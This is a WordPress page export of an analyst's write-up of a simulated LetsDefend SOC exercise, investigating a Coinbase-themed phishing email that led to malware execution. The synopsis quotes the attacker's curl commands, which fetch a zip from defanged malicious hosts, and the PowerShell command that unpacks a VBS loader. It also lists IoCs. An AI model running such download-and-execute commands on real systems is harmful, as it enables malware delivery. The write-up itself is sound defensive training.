{"id":1216,"date":"2026-08-16T21:24:31","date_gmt":"2026-08-16T21:24:31","guid":{"rendered":"https:\/\/victorcoil.tech\/?page_id=1216"},"modified":"2026-08-16T22:44:25","modified_gmt":"2026-08-16T22:44:25","slug":"analyst-note-sample-letsdefend-event-id-315","status":"publish","type":"page","link":"https:\/\/victorcoil.tech\/?page_id=1216","title":{"rendered":"SOC Investigation: Phishing \u2192 Malware Execution"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Additional Info:<br>Investigation Date: 7\/31\/2026<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">1 Hour 34 Minutes Investigation Time<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">A phishing email impersonating Coinbase prompted user interaction, leading to the execution of malicious curl downloads and a VBS loader. The host was contained, malicious artifacts were removed, and no persistence or C2 activity was identified. Case closed as a true positive.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This investigation was performed in a simulated environment (LetsDefend). Certain artifacts, such as full email headers or raw EDR logs, were not available within the platform.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>======== Title(s) ========\n\nSOC337 - Lazarus Phishing Campaign Detected (APT38)\n\n======== Alert Details ========\n\nEvent ID: 315  \nEvent Time: Mar, 06, 2025, 07:15 AM  \nRule : SOC337 - Lazarus Phishing Campaign Detected (APT38)  \nLevel: Incident Responder\n\nSMTP Address : 152.89.61&#91;.]96\n\nSource Address : trevorgreer9312 AT gmail&#91;.]com  \nDestination Address: Ellen AT letsdefend.io\n\nE-mail Subject :Invitation: Coinbase Crypto Trader Hiring Assessment  \nDevice Action: Allowed\n\n======== Raw logs\/Headers ========\n\nN\/a\n\n=============================================\n\n== OSINT\/SandboxAnalysis\/ThreatIntel\/Artifacts\/References ==\n\nhttps:&#47;&#47;www.virustotal.com\/gui\/ip-address\/152.89.61.96\n9\/91\n152.89.61&#91;.]96\n\ntrevorgreer9312 AT gmail&#91;.]com\n\n(https:\/\/www.virustotal.com\/gui\/url\/4d7ebfcefc1b9c25ddcdc921fcc1c792dc289f915532194f8d61d7f931dcae0c)\n14\/92  \nhxxps&#91;]:\/\/]blockchainjobhub&#91;.]com\/invite\/E3fM8yF7\n\n(https:\/\/www.virustotal.com\/gui\/url\/1dc0aa5a2878900868737a96c59e19660832cebbd8816b2860d8b03be851a372)\n8\/97  \nhxxps&#91;]:\/\/]api&#91;.]drivercams&#91;.]cloud\/nvidia-al&#91;.]update\n\n(https:\/\/www.virustotal.com\/gui\/file\/f10f1aa1b1adad456558d79084940b1d3d60329ed92210bbed7e3c55cc0b9a4b)\n18\/60  \nf10f1aa1b1adad456558d79084940b1d3d60329ed92210bbed7e3c55cc0b9a4b\n\n(https:\/\/www.virustotal.com\/gui\/file\/9142d6dce5bf7cf2f690066d57dc86650a824acce7df93192a557eeb64e17c85)\n1\/62  \n9142d6dce5bf7cf2f690066d57dc86650a824acce7df93192a557eeb64e17c85\n\n======== Historical Analysis ========\n\nN\/a\n\n======== Queries Ran ========\n\nInbound traffic to the Ellen host IP of 172.16.17.214, revealing traffic to the download URLs\n\nChecked for outbound traffic from 172.16.17.214 on SIEM, returning no data.\n\nChecked scope to see if the sender address reached out to anyone else, confirmed this is the only host affected.\n\nChecked if URLs \"hxxps&#91;]:\/\/]blockchainjobhub&#91;.]com\/invite\/E3fM8yF7\" and \"hxxps&#91;]:\/\/]files-ld&#91;.]s3&#91;.]us-east-2&#91;.]amazonaws&#91;.]com\/nvidiaupdate&#91;.]zip\" were accessed by anyone else, confirmed this was the only host to access these URLs.\n\n======== Synopsis ========\n\n> Queried the Email Security module for the employee Ellen and found the suspicious email that caused the trigger.\n> Can confirm that the Email was received on Mar, 06, 2025, 07:15 AM from the sender email address listed in the alert details. \n> Checked the reputation of the SMTP Address; internal threat intelligence returned no data, Virustotal marks it as malicious by 9 vendors (https:\/\/www.virustotal.com\/gui\/ip-address\/152.89.61.96)\n> Email body seems to mimic an assessment for a job, and contains a button that leads to a URL of \"hxxps&#91;]:\/\/]blockchainjobhub&#91;.]com\/invite\/E3fM8yF7\" that is marked as malicious as per virustotal (&#91;https:\/\/www.virustotal.com\/gui\/url\/4d7ebfcefc1b9c25ddcdc921fcc1c792dc289f915532194f8d61d7f931dcae0c](https:\/\/www.virustotal.com\/gui\/url\/4d7ebfcefc1b9c25ddcdc921fcc1c792dc289f915532194f8d61d7f931dcae0c))  and tied it to APT 38 activity\n> Endpoint security module shows that the host Ellen visited the malicious link on 2025-03-07 00:21:35 \n> 17-hour delay between email delivery and access; no evidence found to explain the gap (host was possibly idle\/user away, unconfirmed)\n> Log Management reveals that on Mar, 07, 2025, at 12:23 AM, the threat actor ran the command \"\"C:\\Windows\\system32\\curl.exe\" -k -o \"C:\\Users\\LetsDefend\\nvidiaupdate.zip\" hxxps&#91;]:\/\/]api&#91;.]drivercams&#91;.]cloud\/nvidia-al&#91;.]update\" which seems to contact a different URL to download a file  \n> Endpoint security shows another curl command executed at Mar 7 2025, at 00:25:05, with the command being \"\"C:\\Windows\\system32\\curl.exe\" -k -o \"C:\\Users\\LetsDefend\\nvidiaupdate.zip\" hxxps&#91;]:\/\/]files-ld&#91;.]s3&#91;.]us-east-2&#91;.]amazonaws&#91;.]com\/nvidiaupdate&#91;.]zip\"  \n> URL from second Curl Command is marked as malicious by 8 vendors as per virustotal (&#91;https:\/\/www.virustotal.com\/gui\/url\/1dc0aa5a2878900868737a96c59e19660832cebbd8816b2860d8b03be851a372](https:\/\/www.virustotal.com\/gui\/url\/1dc0aa5a2878900868737a96c59e19660832cebbd8816b2860d8b03be851a372))  and tied to a subgroup of Conti.\n> EDR shows confirmed PowerShell execution on Mar 7 2025 00:25:27, revealing decompression of the installed zip file (\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -Command \"Expand-Archive -Force -Path 'C:\\Users\\LetsDefend\\nvidiaupdate.zip' -DestinationPath 'C:\\Users\\LetsDefend\\nvidiadrive'\"). This command was ran 7 times up to the time of Mar 7 2025 00:25:42  \n> At Mar 7 2025 00:25:55 via the EDR, indication of the presence of a VBS script is present at the path of \"C:\\Users\\LetsDefend\\nvidiadrive\\update.vbs\"\n> Checked Run\/RunOnce registry keys, scheduled tasks, and service creation events on the host, no persistence mechanisms identified. Checked outbound connections and DNS queries post-execution, no C2 beaconing identified.\n\n> Following playbook, Deleted Email from Recipients Mailbox  \n> Logged into host via EDR and obtained hashes in the malicious folder.  \n> VBS script is marked as malicious by 18 vendors (&#91;https:\/\/www.virustotal.com\/gui\/file\/f10f1aa1b1adad456558d79084940b1d3d60329ed92210bbed7e3c55cc0b9a4b](https:\/\/www.virustotal.com\/gui\/file\/f10f1aa1b1adad456558d79084940b1d3d60329ed92210bbed7e3c55cc0b9a4b)) and seems to act as a Trojan to update NVIDIA drivers. Seems to come with a BAT file (&#91;https:\/\/www.virustotal.com\/gui\/file\/9142d6dce5bf7cf2f690066d57dc86650a824acce7df93192a557eeb64e17c85](https:\/\/www.virustotal.com\/gui\/file\/9142d6dce5bf7cf2f690066d57dc86650a824acce7df93192a557eeb64e17c85)) and three other files called minictadriver.cat, MiniCtaDriver.inf, and MiniCtaDriver.sys.  \n> Continuing with playbook, contained the Ellen host  \n> Host logs via Event Viewer show that at 3\/7\/2025 12:25:54 AM the VBS script was run using wscript.exe  \n> Removed Malicious Zip and files from host\n\n======== Closure Code ========\n\nTrue positive; activity seems to be related to APT38 as well as a subgroup under Conti.\n\n======== Recommendations ========\n\n> Add IoCs to internal threat intelligence.  \n\n\"\"\nIP: 152.89.61&#91;.]96\nEmail: trevorgreer9312 AT gmail&#91;.]com\nURl: hxxps&#91;]:\/\/]blockchainjobhub&#91;.]com\/invite\/E3fM8yF7\nURL: hxxps&#91;]:\/\/]api&#91;.]drivercams&#91;.]cloud\/nvidia-al&#91;.]update\nSHA256: f10f1aa1b1adad456558d79084940b1d3d60329ed92210bbed7e3c55cc0b9a4b\nSHA256: 9142d6dce5bf7cf2f690066d57dc86650a824acce7df93192a557eeb64e17c85\n\"\"\n> Scan host and continue to monitor\n> Rotate user passwords<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Additional Info:Investigation Date: 7\/31\/2026 1 Hour 34 Minutes Investigation Time A phishing email impersonating Coinbase prompted user interaction, leading to the execution of malicious curl downloads and a VBS loader. The host was contained, malicious artifacts were removed, and no persistence or C2 activity was identified. Case closed as a true positive. This investigation was performed in a simulated environment (LetsDefend). Certain artifacts, such as full email headers or raw EDR logs, were not available within the platform.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"class_list":["post-1216","page","type-page","status-publish","hentry"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 4.9.8 - aioseo.com -->\n\t<meta name=\"description\" content=\"Additional Info:Investigation Date: 7\/31\/2026 1 Hour 34 Minutes Investigation Time A phishing email impersonating Coinbase prompted user interaction, leading to the execution of malicious curl downloads and a VBS loader. The host was contained, malicious artifacts were removed, and no persistence or C2 activity was identified. Case closed as a true positive. This investigation was\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<link rel=\"canonical\" href=\"https:\/\/victorcoil.tech\/?page_id=1216\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 4.9.8\" \/>\n\t\t<meta property=\"og:locale\" content=\"en_US\" \/>\n\t\t<meta property=\"og:site_name\" content=\"Victor Coil | Security Operations &amp; Detection Engineering - Cybersecurity Projects\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"SOC Investigation: Phishing \u2192 Malware Execution - Victor Coil | Security Operations &amp; Detection Engineering\" \/>\n\t\t<meta property=\"og:description\" content=\"Additional Info:Investigation Date: 7\/31\/2026 1 Hour 34 Minutes Investigation Time A phishing email impersonating Coinbase prompted user interaction, leading to the execution of malicious curl downloads and a VBS loader. The host was contained, malicious artifacts were removed, and no persistence or C2 activity was identified. Case closed as a true positive. This investigation was\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/victorcoil.tech\/?page_id=1216\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2026-08-16T21:24:31+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2026-08-16T22:44:25+00:00\" \/>\n\t\t<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n\t\t<meta name=\"twitter:title\" content=\"SOC Investigation: Phishing \u2192 Malware Execution - Victor Coil | Security Operations &amp; Detection Engineering\" \/>\n\t\t<meta name=\"twitter:description\" content=\"Additional Info:Investigation Date: 7\/31\/2026 1 Hour 34 Minutes Investigation Time A phishing email impersonating Coinbase prompted user interaction, leading to the execution of malicious curl downloads and a VBS loader. The host was contained, malicious artifacts were removed, and no persistence or C2 activity was identified. Case closed as a true positive. This investigation was\" \/>\n\t\t<script type=\"application\/ld+json\" class=\"aioseo-schema\">\n\t\t\t{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/?page_id=1216#breadcrumblist\",\"itemListElement\":[{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/victorcoil.tech#listItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/victorcoil.tech\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/?page_id=1216#listItem\",\"name\":\"SOC Investigation: Phishing \\u2192 Malware Execution\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/?page_id=1216#listItem\",\"position\":2,\"name\":\"SOC Investigation: Phishing \\u2192 Malware Execution\",\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/victorcoil.tech#listItem\",\"name\":\"Home\"}}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/?page_id=1216#webpage\",\"url\":\"https:\\\/\\\/victorcoil.tech\\\/?page_id=1216\",\"name\":\"SOC Investigation: Phishing \\u2192 Malware Execution - Victor Coil | Security Operations & Detection Engineering\",\"description\":\"Additional Info:Investigation Date: 7\\\/31\\\/2026 1 Hour 34 Minutes Investigation Time A phishing email impersonating Coinbase prompted user interaction, leading to the execution of malicious curl downloads and a VBS loader. The host was contained, malicious artifacts were removed, and no persistence or C2 activity was identified. Case closed as a true positive. This investigation was\",\"inLanguage\":\"en-US\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/#website\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/?page_id=1216#breadcrumblist\"},\"datePublished\":\"2026-08-16T21:24:31+00:00\",\"dateModified\":\"2026-08-16T22:44:25+00:00\"},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/#website\",\"url\":\"https:\\\/\\\/victorcoil.tech\\\/\",\"name\":\"Victor Coil Portfolio\\\/Project Archive\",\"description\":\"Cybersecurity Projects\",\"inLanguage\":\"en-US\",\"publisher\":{\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/#person\"}}]}\n\t\t<\/script>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"SOC Investigation: Phishing \u2192 Malware Execution - Victor Coil | Security Operations & Detection Engineering","description":"Additional Info:Investigation Date: 7\/31\/2026 1 Hour 34 Minutes Investigation Time A phishing email impersonating Coinbase prompted user interaction, leading to the execution of malicious curl downloads and a VBS loader. The host was contained, malicious artifacts were removed, and no persistence or C2 activity was identified. Case closed as a true positive. This investigation was","canonical_url":"https:\/\/victorcoil.tech\/?page_id=1216","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"BreadcrumbList","@id":"https:\/\/victorcoil.tech\/?page_id=1216#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/victorcoil.tech#listItem","position":1,"name":"Home","item":"https:\/\/victorcoil.tech","nextItem":{"@type":"ListItem","@id":"https:\/\/victorcoil.tech\/?page_id=1216#listItem","name":"SOC Investigation: Phishing \u2192 Malware Execution"}},{"@type":"ListItem","@id":"https:\/\/victorcoil.tech\/?page_id=1216#listItem","position":2,"name":"SOC Investigation: Phishing \u2192 Malware Execution","previousItem":{"@type":"ListItem","@id":"https:\/\/victorcoil.tech#listItem","name":"Home"}}]},{"@type":"WebPage","@id":"https:\/\/victorcoil.tech\/?page_id=1216#webpage","url":"https:\/\/victorcoil.tech\/?page_id=1216","name":"SOC Investigation: Phishing \u2192 Malware Execution - Victor Coil | Security Operations & Detection Engineering","description":"Additional Info:Investigation Date: 7\/31\/2026 1 Hour 34 Minutes Investigation Time A phishing email impersonating Coinbase prompted user interaction, leading to the execution of malicious curl downloads and a VBS loader. The host was contained, malicious artifacts were removed, and no persistence or C2 activity was identified. Case closed as a true positive. This investigation was","inLanguage":"en-US","isPartOf":{"@id":"https:\/\/victorcoil.tech\/#website"},"breadcrumb":{"@id":"https:\/\/victorcoil.tech\/?page_id=1216#breadcrumblist"},"datePublished":"2026-08-16T21:24:31+00:00","dateModified":"2026-08-16T22:44:25+00:00"},{"@type":"WebSite","@id":"https:\/\/victorcoil.tech\/#website","url":"https:\/\/victorcoil.tech\/","name":"Victor Coil Portfolio\/Project Archive","description":"Cybersecurity Projects","inLanguage":"en-US","publisher":{"@id":"https:\/\/victorcoil.tech\/#person"}}]},"og:locale":"en_US","og:site_name":"Victor Coil | Security Operations &amp; Detection Engineering - Cybersecurity Projects","og:type":"article","og:title":"SOC Investigation: Phishing \u2192 Malware Execution - Victor Coil | Security Operations &amp; Detection Engineering","og:description":"Additional Info:Investigation Date: 7\/31\/2026 1 Hour 34 Minutes Investigation Time A phishing email impersonating Coinbase prompted user interaction, leading to the execution of malicious curl downloads and a VBS loader. The host was contained, malicious artifacts were removed, and no persistence or C2 activity was identified. Case closed as a true positive. This investigation was","og:url":"https:\/\/victorcoil.tech\/?page_id=1216","article:published_time":"2026-08-16T21:24:31+00:00","article:modified_time":"2026-08-16T22:44:25+00:00","twitter:card":"summary_large_image","twitter:title":"SOC Investigation: Phishing \u2192 Malware Execution - Victor Coil | Security Operations &amp; Detection Engineering","twitter:description":"Additional Info:Investigation Date: 7\/31\/2026 1 Hour 34 Minutes Investigation Time A phishing email impersonating Coinbase prompted user interaction, leading to the execution of malicious curl downloads and a VBS loader. The host was contained, malicious artifacts were removed, and no persistence or C2 activity was identified. Case closed as a true positive. This investigation was"},"aioseo_meta_data":{"post_id":"1216","title":null,"description":null,"keywords":null,"keyphrases":{"focus":{"keyphrase":"","score":0,"analysis":{"keyphraseInTitle":{"score":0,"maxScore":9,"error":1}}},"additional":[]},"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":"","og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"WebPage","isEnabled":true},"graphs":[]},"schema_type":"default","schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":"-1","robots_max_videopreview":"-1","robots_max_imagepreview":"large","priority":null,"frequency":"default","local_seo":null,"breadcrumb_settings":null,"limit_modified_date":false,"ai":{"faqs":[],"keyPoints":[],"schemas":[],"titles":[],"descriptions":[],"socialPosts":{"email":[],"linkedin":[],"twitter":[],"facebook":[],"instagram":[]}},"created":"2026-08-16 21:24:32","updated":"2026-08-16 22:44:25","seo_analyzer_scan_date":null},"aioseo_breadcrumb":"<div class=\"aioseo-breadcrumbs\"><span class=\"aioseo-breadcrumb\">\n\t\t\t<a href=\"https:\/\/victorcoil.tech\" title=\"Home\">Home<\/a>\n\t\t<\/span><span class=\"aioseo-breadcrumb-separator\">&raquo;<\/span><span class=\"aioseo-breadcrumb\">\n\t\t\tSOC Investigation: Phishing \u2192 Malware Execution\n\t\t<\/span><\/div>","aioseo_breadcrumb_json":[{"label":"Home","link":"https:\/\/victorcoil.tech"},{"label":"SOC Investigation: Phishing \u2192 Malware Execution","link":"https:\/\/victorcoil.tech\/?page_id=1216"}],"_links":{"self":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/1216","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1216"}],"version-history":[{"count":2,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/1216\/revisions"}],"predecessor-version":[{"id":1223,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/1216\/revisions\/1223"}],"wp:attachment":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1216"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}